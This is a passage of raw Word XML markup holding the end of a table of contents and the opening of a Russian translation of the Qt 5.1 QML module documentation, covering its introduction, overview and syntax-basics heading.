      <w:hyperlink w:anchor="_Toc483605698" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Inspecting Items</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605698 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>358</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605699" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Inspecting User Interfaces</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605699 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>359</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000D7D84" w:rsidRDefault="00385670">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00160CEF" w:rsidRPr="00D815C8" w:rsidRDefault="009B0257" w:rsidP="00160CEF">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc382058561"/>
      <w:bookmarkStart w:id="2" w:name="_Toc483000520"/>
      <w:bookmarkStart w:id="3" w:name="_Toc483003565"/>
      <w:bookmarkStart w:id="4" w:name="_Toc483603873"/>
      <w:bookmarkStart w:id="5" w:name="_Toc483605093"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>QML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="00490E7E" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="005636BE" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtqml/qtqml-index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="009B0257" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> модуль </w:t>
      </w:r>
      <w:r w:rsidR="00B00C9F" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>qt</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> обеспечивает </w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>разработку</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> приложения и библиотек</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> при помощи </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">языка </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Он объявляет и реализует язык и </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>движок</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и обеспечивает программный интерфейс, чтобы предоставить возможность разработчикам приложения </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">расширить язык </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> при помощи ча</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>тных типов</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>интегрирова</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">ть </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> код с </w:t>
      </w:r>
      <w:r w:rsidR="004E4201" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>java script</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ом и С</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>++</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Заметьте, что если </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> модуль обеспечивает язык и инфра</w:t>
      </w:r>
      <w:r w:rsidR="00D95FF2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>структур</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">у для </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> приложения, то </w:t>
      </w:r>
      <w:r w:rsidR="00FB6D7B" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> модуль обеспечивает много визуальных компонентов, поддержку модель-представление и каркас для анимации, а также многое другое для построения интерфейса пользователя.</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее приводятся некоторые ссылки и типы </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Теперь переходим к подразделам данного модуля для изучения </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A25E2" w:rsidRPr="00D815C8" w:rsidRDefault="008A25E2" w:rsidP="008A25E2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc382058562"/>
      <w:bookmarkStart w:id="7" w:name="_Toc483000521"/>
      <w:bookmarkStart w:id="8" w:name="_Toc483003566"/>
      <w:bookmarkStart w:id="9" w:name="_Toc483603874"/>
      <w:bookmarkStart w:id="10" w:name="_Toc483605094"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ОБЗОР</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="00490E7E" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtqml/qmlreference.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="009B0257" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – это </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>декларативный язык</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> для создания высоко динамических приложений. При помощи </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> строительные блоки приложения, такие как </w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gui</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> компоненты, объявляются и в них устанавливаются различные свойства, которые определяют поведение приложения. При объединении с </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>поведение приложения становится</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>скриптовым</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Вдобавок </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> сильно использует </w:t>
      </w:r>
      <w:r w:rsidR="00B00C9F" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qt</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, который позволяет использовать различные особенности </w:t>
      </w:r>
      <w:r w:rsidR="00B00C9F" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qt</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> из </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> приложений. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A25E2" w:rsidRPr="00D815C8" w:rsidRDefault="008A25E2" w:rsidP="008A25E2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc382058563"/>
      <w:bookmarkStart w:id="12" w:name="_Toc483000522"/>
      <w:bookmarkStart w:id="13" w:name="_Toc483003567"/>
      <w:bookmarkStart w:id="14" w:name="_Toc483603875"/>
      <w:bookmarkStart w:id="15" w:name="_Toc483605095"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ОСНОВЫ СИНТАКСИСА</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="00490E7E" w:rsidP="00F15C30">
